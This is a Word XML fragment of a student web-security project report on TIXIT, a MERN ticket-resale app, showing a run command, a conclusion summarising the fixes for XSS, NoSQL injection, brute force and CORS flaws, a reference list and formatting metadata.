      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C39B17" w14:textId="24A04D2E" w:rsidR="00EE11A0" w:rsidRDefault="00EE11A0" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc214584817"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Test Scenarios</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="4F94A092" w14:textId="7C86AC96" w:rsidR="00EE11A0" w:rsidRPr="00BE7BE3" w:rsidRDefault="00F13D01" w:rsidP="001A651C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow all the attempted scripts as mentioned in </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Exploit_Simulations_&amp;" w:history="1">
        <w:r w:rsidR="00582176" w:rsidRPr="00582176">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Section 4: Exploit Simulation and Fixes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6812E920" w14:textId="28FC3F5E" w:rsidR="00EE11A0" w:rsidRDefault="00EE11A0" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc214584818"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="4E35EB3E" w14:textId="77777777" w:rsidR="001A651C" w:rsidRPr="001A651C" w:rsidRDefault="001A651C" w:rsidP="001A651C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>The TIXIT project demonstrates the complete lifecycle of building, attacking, and securing a modern MERN web application. By simulating real-world vulnerabilities such as XSS, NoSQL injection, brute-force attacks, unsafe CORS, and insecure password flows, the project highlights how easily web applications can be compromised without proper safeguards. Each identified flaw was mapped to OWASP practices and systematically mitigated using industry-standard techniques including sanitization, strict validation, CSP, CORS hardening, rate-limiting, secure JWT authentication, and protected password change logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B6C31" w14:textId="0E6D48E1" w:rsidR="001A651C" w:rsidRPr="001A651C" w:rsidRDefault="001A651C" w:rsidP="001A651C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t xml:space="preserve">Through this process, TIXIT evolved from a basic ticket resale system into a security-hardened application with production-grade </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>. This project reinforced key web security concepts, strengthened secure coding practices, and showcased the importance of integrating security at every stage of development—not as an afterthought, but as a core requirement of building reliable, modern web systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A963D" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="001A651C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TixIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> successfully demonstrates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE25F87" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="001A651C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Full-stack engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53778ED1" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="001A651C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Realistic exploit simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAEBA6C" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="001A651C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Proper threat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>modeling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46329A8D" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="001A651C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Security-focused development lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5FDA7B" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="001A651C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fixes aligned with industry standards (OWASP Top 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A373135" w14:textId="77777777" w:rsidR="001A651C" w:rsidRPr="00F13D01" w:rsidRDefault="001A651C" w:rsidP="001A651C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4D708E" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="001A651C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This project exceeds the requirements of a typical coursework submission and reflects </w:t>
      </w:r>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>production-grade security hardening</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E97BC60" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01"/>
    <w:p w14:paraId="5BD2736B" w14:textId="4B52B68D" w:rsidR="00EE11A0" w:rsidRDefault="00EE11A0" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc214584819"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="215DDC69" w14:textId="45F87561" w:rsidR="00F13D01" w:rsidRPr="001A651C" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DD70AD" w14:textId="45DC2813" w:rsidR="00F13D01" w:rsidRPr="001A651C" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Mongoose Docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52387018" w14:textId="6E9C6E83" w:rsidR="00F13D01" w:rsidRPr="001A651C" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>sanitize-html Docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A311AFD" w14:textId="2203F85E" w:rsidR="00F13D01" w:rsidRPr="001A651C" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>express-rate-limit Docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E546AF" w14:textId="5F43B3FF" w:rsidR="00F13D01" w:rsidRPr="001A651C" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Helmet Docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED57B31" w14:textId="30E0FB0A" w:rsidR="00F13D01" w:rsidRPr="001A651C" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>bcryptjs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE3FBEA" w14:textId="504A8EB4" w:rsidR="00F13D01" w:rsidRPr="001A651C" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Joi Docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B6415D" w14:textId="27BFBA13" w:rsidR="00F13D01" w:rsidRPr="001A651C" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Passport.js Docs</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F13D01" w:rsidRPr="001A651C" w:rsidSect="008907A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73B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2176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174A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CCD8F70E"/>
    <w:lvl w:ilvl="0" w:tplc="78CA6C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04050"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FB16367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AF7BAA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E58EFFA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C681D45"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF58DE38"/>
    <w:lvl w:ilvl="0" w:tplc="A52063D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2C7A0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="266C8834"/>
    <w:lvl w:ilvl="0" w:tplc="B2D04D9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92143A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8514E5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5E0B0F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B330EE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EF5F14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7143F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1D2CA3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94EA4314"/>
    <w:lvl w:ilvl="0" w:tplc="B612489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7B1FFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2C6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B009B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3612A900"/>
    <w:lvl w:ilvl="0" w:tplc="B612489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9F7485"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E02ED85C"/>
    <w:lvl w:ilvl="0" w:tplc="B612489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871C47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07A459B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F5808EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="867815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23E2757"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09B81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0491B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F80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96002"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="217AC6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6F6834"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A81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74B4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01223"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10223C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A261229"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13366D78"/>
    <w:lvl w:ilvl="0" w:tplc="825ECF9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3D8C5ED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E3552E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="14B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B2BD1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="610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C5078"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F6A4B34"/>
    <w:lvl w:ilvl="0" w:tplc="F13AEA8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7AA16E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63EE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A1C82"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D264B6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CA6161A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="14241E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A7FBA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1C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F29FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7852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74008"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7ECA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056AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0FFED7F8"/>
    <w:lvl w:ilvl="0" w:tplc="D73497EE">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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="68E439A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="858EF936"/>
    <w:lvl w:ilvl="0" w:tplc="F13AEA8A">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96B0916"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="92E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72CD5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5EBCAF6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E015B2B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="863E7F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F734BF3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="783C17EA"/>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807C08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="362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6A5D6F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ABD457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B507885"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5CB85CB4"/>
    <w:lvl w:ilvl="0" w:tplc="B612489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6774509">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1907570899">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="729963206">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="508637220">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="540440426">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="346298173">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="635985464">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1202784191">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="386882051">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="417529987">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1797796635">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1942299047">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="929504875">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1423798555">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1471286013">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="970668003">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="74207635">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1810629582">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1953049697">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="37709969">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1488205820">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="440884757">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="259994979">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="922297565">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="664288795">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1137532628">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1932008081">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1781292369">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="411392478">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="852499750">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="586814952">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="2093774753">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1265923952">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1198928399">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1524635983">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="2120104644">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="723219867">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1601253742">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1389919496">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="2083407277">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="154108670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9B"/>
    <w:rsid w:val="001A651C"/>
    <w:rsid w:val="002B2C87"/>
    <w:rsid w:val="003A327C"/>
    <w:rsid w:val="004E318F"/>
    <w:rsid w:val="00582176"/>
    <w:rsid w:val="005C380E"/>
    <w:rsid w:val="007F0187"/>
    <w:rsid w:val="008907AE"/>
    <w:rsid w:val="009A6792"/>
    <w:rsid w:val="00A04C9B"/>
    <w:rsid w:val="00AA1442"/>
    <w:rsid w:val="00B5508E"/>
